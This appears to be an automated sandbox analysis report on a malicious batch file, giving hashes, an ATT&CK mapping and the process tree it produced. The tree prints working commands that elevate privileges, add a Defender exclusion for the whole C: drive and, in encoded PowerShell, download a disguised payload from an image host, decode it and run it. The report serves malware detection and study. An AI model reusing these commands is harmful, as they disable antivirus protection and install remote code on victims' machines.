4d5a2a643cdab50f0105e110a8187cd812a7ebbc7d903b8a8029cd3508094f32

General

Target

t.cmd
Size

1KB
MD5

c3a80dbc5b98aac01cc124b59ec52d7e
SHA1

eae4d2a89be841042839e8bfeca7480a2ba327e4
SHA256

4d5a2a643cdab50f0105e110a8187cd812a7ebbc7d903b8a8029cd3508094f32
SHA512

addf559ed04d9cbaccdc25d87940c0c0af41e183087c9c956bab438b7cf755a7481aa88d534792c265ace9491302ae81343de77d4c93101a232d44d47500d5a9

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://i.imghippo.com/files/Zf9637kKg.jpg

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2768	powershell.exe
2388	powershell.exe
2368	powershell.exe
2652	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2388	powershell.exe
2368	powershell.exe
2368	powershell.exe
2368	powershell.exe
2768	powershell.exe
2740	powershell.exe
2652	powershell.exe
2616	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 2388	2128	cmd.exe	31
PID 2128 wrote to memory of 2388	2128	cmd.exe	31
PID 2128 wrote to memory of 2388	2128	cmd.exe	31
PID 2128 wrote to memory of 2368	2128	cmd.exe	32
PID 2128 wrote to memory of 2368	2128	cmd.exe	32
PID 2128 wrote to memory of 2368	2128	cmd.exe	32
PID 2368 wrote to memory of 2340	2368	powershell.exe	33
PID 2368 wrote to memory of 2340	2368	powershell.exe	33
PID 2368 wrote to memory of 2340	2368	powershell.exe	33
PID 2340 wrote to memory of 2768	2340	cmd.exe	35
PID 2340 wrote to memory of 2768	2340	cmd.exe	35
PID 2340 wrote to memory of 2768	2340	cmd.exe	35
PID 2340 wrote to memory of 2740	2340	cmd.exe	36
PID 2340 wrote to memory of 2740	2340	cmd.exe	36
PID 2340 wrote to memory of 2740	2340	cmd.exe	36
PID 2740 wrote to memory of 2652	2740	powershell.exe	37
PID 2740 wrote to memory of 2652	2740	powershell.exe	37
PID 2740 wrote to memory of 2652	2740	powershell.exe	37
PID 2340 wrote to memory of 2616	2340	cmd.exe	38
PID 2340 wrote to memory of 2616	2340	cmd.exe	38
PID 2340 wrote to memory of 2616	2340	cmd.exe	38

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\t.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w h -command ""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\t.cmd' -ArgumentList 'am_admin'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2368
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\t.cmd" am_admin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w h -command ""
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2740
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGkALgBpAG0AZwBoAGkAcABwAG8ALgBjAG8AbQAvAGYAaQBsAGUAcwAvAFoAZgA5ADYAMwA3AGsASwBnAC4AagBwAGcAIgA7ACQAcABhAHQAaAA9ACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABPAG4AZQBEAHIAaQB2AGUAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AGkAdwByACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABwAGEAdABoAFwAYgB1AGQAZAB5AC4AagBwAGcAIgA7AFsASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAVABlAHgAdAAoACIAJABwAGEAdABoAFwATwBuAGUARAByAGkAdgBlAC4AYwBtAGQAIgAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAZwBjACAAIgAkAHAAYQB0AGgAXABiAHUAZABkAHkALgBqAHAAZwAiACAALQBSAGEAdwApACkAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAJABwAGEAdABoAFwATwBuAGUARAByAGkAdgBlAC4AYwBtAGQAIgA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
63e0b08036c255260fd0d81d8d89748a

SHA1
e6b8dd7b7c50a1d5d5334cfa305f96dc2a65842c

SHA256
e64bcc70217457cfe419f23824a41961a60a2ad01227d73932a87d9e9cc20d72

SHA512
b28317da008026e8348ae9b34563217d99dbd19236fedcb029581e3329e374890dabd037ded3e5b4462136ce421718796b03a0bd1efeccc9a1ac20460a2ca235

Download Submit
memory/2368-14-0x0000000002C10000-0x0000000002C90000-memory.dmp

Filesize
512KB

Download
memory/2368-15-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/2368-16-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/2388-4-0x000007FEF551E000-0x000007FEF551F000-memory.dmp

Filesize
4KB

Download
memory/2388-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2388-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/2388-7-0x0000000002C74000-0x0000000002C77000-memory.dmp

Filesize
12KB

Download
memory/2388-8-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing